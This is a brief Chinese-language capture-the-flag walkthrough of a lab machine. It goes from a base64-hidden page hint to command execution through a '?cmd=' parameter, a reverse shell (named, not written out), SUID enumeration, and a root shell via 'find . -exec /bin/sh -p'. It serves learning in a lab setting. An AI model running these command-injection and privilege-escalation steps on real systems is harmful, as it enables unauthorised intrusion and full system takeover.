信息收集
确定靶机ip地址(前面就确定了,这里省略)和开放的服务

漏洞挖掘
可见开放了ssh和http,访问http看看,前端代码查看得到
<!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->
三次base64解密得到的:workinginprogress.php
访问看看

发现提示信息,可能存在命令执行,尝试?cmd=pwd

确实有命令执行
漏洞利用
直接反弹shell


提权
python模块得到标准格式:python -c 'import pty;pty.spawn("/bin/bash")'
查找suid权限的可执行文件
find / -perm -u=s -type f 2>/dev/null

发现find有这个权限,直接提权
find . -exec /bin/sh -p \; -quit
后渗透
然后到/root目录,发现robots.txt,将其内容base64解码,通关

注意
本文章内容仅限于交流学习,不可利用其中的方法进行非法行为,否则后果自负!!!